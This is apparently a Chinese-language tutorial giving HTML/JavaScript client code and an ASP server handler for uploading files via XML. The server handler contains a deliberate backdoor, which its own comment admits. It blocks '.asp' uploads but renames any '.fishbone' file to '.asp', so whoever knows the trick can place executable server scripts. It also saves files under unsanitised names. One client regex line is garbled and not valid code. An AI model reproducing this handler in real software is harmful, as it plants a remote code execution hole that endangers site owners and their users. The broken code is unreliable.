html上传文件的实例

html页面代码

 

<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
上传文件<INPUT TYPE="file" NAME="" id="a"><br>
存放路径<INPUT TYPE="text" NAME="" id="b" onclick="showpath()">需写上文件名<BR>
<input type=button onclick='upload($("a").value,$("b").value)' value=上传><br>
<span id="spath"></span><br>
<span id="nowurl"></span>
<STYLE TYPE="text/css" TITLE="">
.tfont{font-size:12px}
</STYLE> 


<SCRIPT LANGUAGE="JavaScript">
<!--
function showpath(){
    var path=new Ajax();
    var d=function(o){
    $("spath").innerHTML=o.responseText;};
    var w=function(){};
    path.open("http://10.84.50.220/WebService1/uploadfile.asp","post",d,w);
}
function overit(){
event.srcElement.style.cursor="hand";
event.srcElement.style.background="#EECC99";
}
function outit(){
event.srcElement.style.background="transparent";
}
function s(){
event.srcElement.parentNode.style.display="none";
$("b").focus();
$('b').value=event.srcElement.innerHTML;
}
function upload(surl,turl){
    surl=surl.replace(///g,"//");
    var read=new xmlhttp();
    var read2=new xmlhttp();
    var xml_dom = new ActiveXObject("MSXML2.DOMDocument");
    xml_dom.loadXML('<?xml version="1.0" ?> <root/>');
    xml_dom.documentElement.setAttribute("xmlns:dt", "urn:schemas-microsoft-com:datatypes");
    var l_node1 = xml_dom.createElement("file1");
    var fname = xml_dom.createElement("name");
    l_node1.dataType = "bin.base64";
    read.open("get",surl,true);
    read.onreadystatechange=p;
    read.send(null);
        function p(){
            if (read.readystate==4)
            {
                fname.nodeTypedValue=turl;
                l_node1.nodeTypedValue =read.responseBody;
                xml_dom.documentElement.appendChild(l_node1);
                xml_dom.documentElement.appendChild(fname);
                read2.open("POST","http://10.84.50.220/WebService1/uploadfile.asp",true);
                try{read2.setRequestHeader("Content-Type","text/xml");}catch(e){
                try{read2.overrideMimeType('text/xml');}catch(e){}
            }
        read2.onreadystatechange=function(){
            if(read2.readystate==4&&read2.status==200){
                $("nowurl").innerHTML="<a href=http://www.cnjpzs.com/fishbone/"+turl+">now url</a>";
            }
                else{$("nowurl").innerHTML="上传中……"+read2.readystate;}
            }
        read2.send(xml_dom);
        }
    }
}
//xmlhttprequest对象
function xmlhttp(){
var xmlhttp = false;//以下写法为JS条件编译写法
/*@cc_on
   @if (@_jscript_version >= 5)
      try {
      xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
      }
      catch (e){
         try {
         xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
         }
         catch (e2){
         xmlhttp = false
         }
      }
   @end
@*/
if (!xmlhttp && typeof XMLHttpRequest != 'undefined')
    {xmlhttp = new XMLHttpRequest()}
return xmlhttp;
}
/*Ajax核心,兼容IE以及FF的XMLHttpRequest对象*/
function Ajax(){
    var xmlhttp = false,isComplete = false;//以下写法为JS条件编译写法
    /*@cc_on
       @if (@_jscript_version >= 5)
          try {
          xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
          }
          catch (e){
             try {
             xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
             }
             catch (e2){
             xmlhttp = false
             }
          }
       @end
    @*/
    if (!xmlhttp && typeof XMLHttpRequest != 'undefined')
        {xmlhttp = new XMLHttpRequest()}
     this.open = function(url, method, feedback,process, arg)
      {
        if (!xmlhttp) return false;
        isComplete = false;
        method = method.toUpperCase();
    
        try {
          if (method == "GET")
          {
            xmlhttp.open(method, url+"?"+arg, true);
            arg = null;
          }
          else
          {
            xmlhttp.open(method, url, true);
            xmlhttp.setRequestHeader("Method", "POST "+url+" HTTP/1.1");
            xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
            xmlhttp.setRequestHeader("Connection","close");
          }
          xmlhttp.onreadystatechange = function(){
            if (xmlhttp.readyState == 4 && !isComplete)
            {
              isComplete = true;
              if(xmlhttp.status==200){
                  feedback(xmlhttp);}
                  else{feedback(xmlhttp.status)}
              }
              else
              {process(xmlhttp.readyState);}
              
              };
          xmlhttp.send(arg);
        }
        catch(z) { return false; }
        return true;
      };
      return this;
};
//=================
//-->
</SCRIPT>

 对应的服务器上传文件：

 

<%@ language=vbscript codepage=65001%>
<%
dim ado_stream
dim xml_dom
dim xml_file1
Dim str
On Error Resume next
set ado_stream = Server.CreateObject("ADODB.Stream")
Set xml_dom = Server.CreateObject("Microsoft.XMLDOM")
xml_dom.load(request)
set xml_file1 = xml_dom.selectSingleNode("root/file1")
Set xml_name=xml_dom.selectSingleNode("root/name")
Set reg=new RegExp
reg.pattern=".asp"
str=xml_name.nodeTypedValue
str=Replace(str,".asp",".txt")'将上传的asp文件重命名，防止别人上传asp文件
str=Replace(str,".fishbone",".asp")'如果name的后缀名为fishbone,则更名成asp文件，给自己上传asp文件留后门
ado_stream.Type = 1 
ado_stream.open 
ado_stream.write xml_file1.nodeTypedValue
ado_stream.SaveToFile server.mappath(".")&""&str,2 ' 2=adSaveCreateOverWrite 
ado_stream.close
set ado_stream = Nothing 
set xml_dom = Nothing
If Err.number<>0 Then response.write Err.description
Response.Write "Upload successful!"
%>